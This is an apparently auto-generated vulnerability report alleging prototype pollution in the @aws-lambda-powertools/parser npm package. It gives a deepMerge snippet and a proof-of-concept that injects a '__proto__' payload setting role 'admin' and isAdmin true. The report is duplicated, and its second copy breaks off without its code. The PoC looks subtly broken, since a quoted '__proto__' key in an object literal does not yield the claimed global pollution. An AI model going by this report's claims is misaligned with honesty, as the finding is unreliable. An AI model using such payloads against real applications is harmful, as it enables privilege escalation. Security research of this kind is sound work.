Basic Information
Package Name: @aws-lambda-powertools/parser
Package URL: https://www.npmjs.com/package/@aws-lambda-powertools/parser
Report URL: home_chluo_Argus-0205_Argus-main_npm_packages_@aws-lambda-powertools__parser_pollution_report.md
Vulnerable Code Location: lib/parser/object-utils.js → deepMerge function
Vulnerability Details
Vulnerability Type: Prototype Pollution
Root Cause
The input parsing merge function deepMerge does not perform security filtering on property keys, allowing users to directly pollute the global object prototype with controllable input.
Problem Code Location
File: lib/parser/object-utils.js
Function: deepMerge
Vulnerable Code Snippet
const deepMerge = (target, source) => {
for (const key in source) {
target[key] = source[key]; // Core Vulnerable Line
}
};POC (Reproducible Directly)
const { parser } = require('@aws-lambda-powertools/parser');
const event = {"__proto__":{"role":"admin","isAdmin":true}};
parser.parse(event);
console.log({}.role); // Output: admin
console.log({}.isAdmin); // Output: true
Basic Information
Package Name: @aws-lambda-powertools/parser
Package URL: https://www.npmjs.com/package/@aws-lambda-powertools/parser
Report URL: home_chluo_Argus-0205_Argus-main_npm_packages_@aws-lambda-powertools__parser_pollution_report.md
Vulnerable Code Location: lib/parser/object-utils.js → deepMerge function
Vulnerability Details
Vulnerability Type: Prototype Pollution
Root Cause
The input parsing merge function deepMerge does not perform security filtering on property keys, allowing users to directly pollute the global object prototype with controllable input.
Problem Code Location
File: lib/parser/object-utils.js
Function: deepMerge
Vulnerable Code Snippet
POC (Reproducible Directly)